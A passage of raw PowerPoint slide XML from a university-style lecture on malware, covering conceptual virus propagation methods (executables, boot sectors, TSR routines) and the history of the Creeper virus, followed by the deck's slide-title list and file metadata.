              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> propagates by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>infecting other programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Automatically creates copies of itself, but to propagate, a human has to run an infected program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Self-propagating malware usually called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" smtClean="0"/>
              <a:t>worm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Many propagation methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Insert a copy into every executable (.COM, .EXE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Insert a copy into boot sectors of disks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>PC era: “Stoned” virus infected PCs booted from infected floppies, stayed in memory, infected every inserted floppy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Infect TSR (terminate-and-stay-resident) routines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>By infecting a common OS routine, a virus can always stay in memory and infect all disks, executables, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18203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A725FA14-3128-4A14-BFC6-E4722CAA1CF0}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>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914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>First Virus: Creeper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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Written in 1971 at BBN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Infected DEC PDP-10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/>
              <a:t>   machines running TENEX OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Jumped from machine to machine over ARPANET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Copied its state over, tried to delete old copy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Payload: displayed a message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/>
              <a:t>   “I’m the creeper, catch me if you can!”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Later, Reaper was written to hunt down Creeper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0" y="28289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4038600" y="1143000"/>
            <a:ext cx="4979988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http://history-computer.com/Internet/Maturing/Thomas.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12295" name="Picture 2" descr="http://www.herongyang.com/Computer-History/PDP-10-and-TENE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57338"/>
            <a:ext cx="1752600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9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203</TotalTime>
  <Words>2522</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>358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Georgia</vt:lpstr>
      <vt:lpstr>Monotype Sorts</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Urban</vt:lpstr>
      <vt:lpstr>Viruses, Rootkits, and More…</vt:lpstr>
      <vt:lpstr>Malware</vt:lpstr>
      <vt:lpstr>Remote Vulnerabilities (2001-06)</vt:lpstr>
      <vt:lpstr>Trojans</vt:lpstr>
      <vt:lpstr>“Reflections on Trusting Trust”</vt:lpstr>
      <vt:lpstr>Example of a Trojan</vt:lpstr>
      <vt:lpstr>More Trojans</vt:lpstr>
      <vt:lpstr>Viruses</vt:lpstr>
      <vt:lpstr>First Virus: Creeper</vt:lpstr>
      <vt:lpstr>Virus Techniques</vt:lpstr>
      <vt:lpstr>Polymorphic Viruses</vt:lpstr>
      <vt:lpstr>Virus Detection</vt:lpstr>
      <vt:lpstr>Virus Detection by Emulation</vt:lpstr>
      <vt:lpstr>Obfuscation and Anti-Debugging</vt:lpstr>
      <vt:lpstr>How Hard Is It to Write a Virus?</vt:lpstr>
      <vt:lpstr>Viruses in P2P Networks</vt:lpstr>
      <vt:lpstr>Prevalence of Viruses in KaZaA</vt:lpstr>
      <vt:lpstr>Dangerous KaZaA Queries</vt:lpstr>
      <vt:lpstr>Stealth Techniques</vt:lpstr>
      <vt:lpstr>Propagation via Websites</vt:lpstr>
      <vt:lpstr>Malicious Functionality</vt:lpstr>
      <vt:lpstr>Drive-By Downloads</vt:lpstr>
      <vt:lpstr>Obfuscated JavaScript</vt:lpstr>
      <vt:lpstr>“Ghost in the Browser”</vt:lpstr>
      <vt:lpstr>Compromised Web Server</vt:lpstr>
      <vt:lpstr>Redirection Using .htaccess</vt:lpstr>
      <vt:lpstr>User-Contributed Content</vt:lpstr>
      <vt:lpstr>Social Engineering</vt:lpstr>
      <vt:lpstr>Fake Antivirus</vt:lpstr>
      <vt:lpstr>Malware Binaries</vt:lpstr>
      <vt:lpstr>Remote Administration Tools</vt:lpstr>
      <vt:lpstr>Communicating Via Backdoors</vt:lpstr>
      <vt:lpstr>Rootkits</vt:lpstr>
      <vt:lpstr>Hiding Rookit’s Presence on Unix</vt:lpstr>
      <vt:lpstr>Real-Life Examples</vt:lpstr>
      <vt:lpstr>Kernel Rootkits</vt:lpstr>
      <vt:lpstr>Mebroot (Windows)</vt:lpstr>
      <vt:lpstr>Detecting Rootkit’s Presence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Virtualization by Implementation</dc:title>
  <dc:creator>tomkay</dc:creator>
  <cp:lastModifiedBy>Thomas Kay</cp:lastModifiedBy>
  <cp:revision>27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-05-22T19:01:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-09-16T21:03:43Z</dcterms:modified>
</cp:coreProperties>
</file>